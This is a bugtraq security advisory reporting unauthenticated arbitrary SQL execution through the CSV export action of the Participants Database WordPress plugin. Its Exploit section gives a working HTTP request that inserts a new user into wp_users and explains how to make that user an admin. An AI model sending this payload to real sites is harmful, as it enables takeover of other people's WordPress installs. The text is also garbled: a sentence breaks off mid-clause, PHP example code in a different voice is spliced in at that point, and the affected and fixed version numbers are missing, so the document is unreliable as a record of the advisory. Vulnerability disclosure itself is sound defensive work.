Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

From: Yarubo Internet Security Scan <no-reply@yarubo.com>
To: bugtraq@securityfocus.com
Subject: Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

Program: Participants Database <=
Severity: Unauthenticated attacker can fully compromise the Wordpress
Permalink: http://www.yarubo.com/advisories/1

— Info —

Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.

— Vulnerability details —

1. If any of the shortcodes is used (e.g. signup page) then it is
possible for anonymous (unauthenticated) users to trigger some
administrative actions.

2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated
user can execute arbitrary SQL statements (e.g. create an admin user,
read or write files, or execute code depending on the MySQL user
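The pattern described in points 1 and 2, shown as an added illustration that is not the plugin's own code and not the vendor's fix: a WordPress action handler that executes a client-supplied "query" string, beside a hardened version that checks capability and a nonce and assembles the SQL server-side. The function names, the nonce action, the table name and the column whitelist are hypothetical.

```php
<?php
// Added illustration (hypothetical code, not the plugin's source).

// VULNERABLE PATTERN: any visitor who can reach a page carrying the
// shortcode can POST action=output CSV with an arbitrary SQL string,
// and that string is handed to the database unchanged.
function vulnerable_export_handler() {
    global $wpdb;
    if ( isset( $_POST['action'] ) && $_POST['action'] === 'output CSV' ) {
        $sql  = $_POST['query'];            // attacker-controlled SQL
        $rows = $wpdb->get_results( $sql ); // executed verbatim
        // ... write $rows out as CSV ...
    }
}

// HARDENED PATTERN: privileged users only, valid nonce required, and the
// statement is built from a fixed column whitelist plus one bound integer.
function hardened_export_handler() {
    global $wpdb;
    if ( ! isset( $_POST['action'] ) || $_POST['action'] !== 'output CSV' ) {
        return;
    }
    // 1. Authorization: anonymous and low-privilege users are rejected.
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Not allowed', '', array( 'response' => 403 ) );
    }
    // 2. CSRF protection: the form must carry a nonce issued to this user
    //    (nonce action name is hypothetical).
    check_admin_referer( 'pdb_export_csv' );
    // 3. Never accept SQL from the client. Accept column names instead and
    //    keep only those present in the whitelist.
    $allowed = array( 'id', 'first_name', 'last_name', 'email' );
    $wanted  = isset( $_POST['columns'] ) ? (array) $_POST['columns'] : $allowed;
    $columns = array_values( array_intersect( $allowed, array_map( 'sanitize_key', $wanted ) ) );
    if ( empty( $columns ) ) {
        $columns = $allowed;
    }
    $table = $wpdb->prefix . 'participants'; // hypothetical table name
    $limit = isset( $_POST['limit'] ) ? absint( $_POST['limit'] ) : 1000;
    // Identifiers come from the whitelist; the only client value reaching
    // the statement is an integer bound through prepare().
    $sql  = $wpdb->prepare(
        'SELECT ' . implode( ', ', $columns ) . " FROM {$table} LIMIT %d",
        $limit
    );
    $rows = $wpdb->get_results( $sql, ARRAY_A );
    // ... write $rows out as CSV ...
}
```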

— Exploit —

Add a user to wordpress as follows (if you want an admin user, add
admin privileges to wp_usermeta):

POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
Content-Type: multipart/form-data;

Content-Disposition: form-data; name="action"

output CSV
Content-Disposition: form-data; name="CSV_type"

participant list
Content-Disposition: form-data; name="subsource"

Content-Disposition: form-data; name="query"

INSERT INTO wp_users
VALUES (31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);


— Solution —

This issue has been fixed in version Download the newest version from:


— Credit —

Yarubo Research Team
research [at] yarubo.com
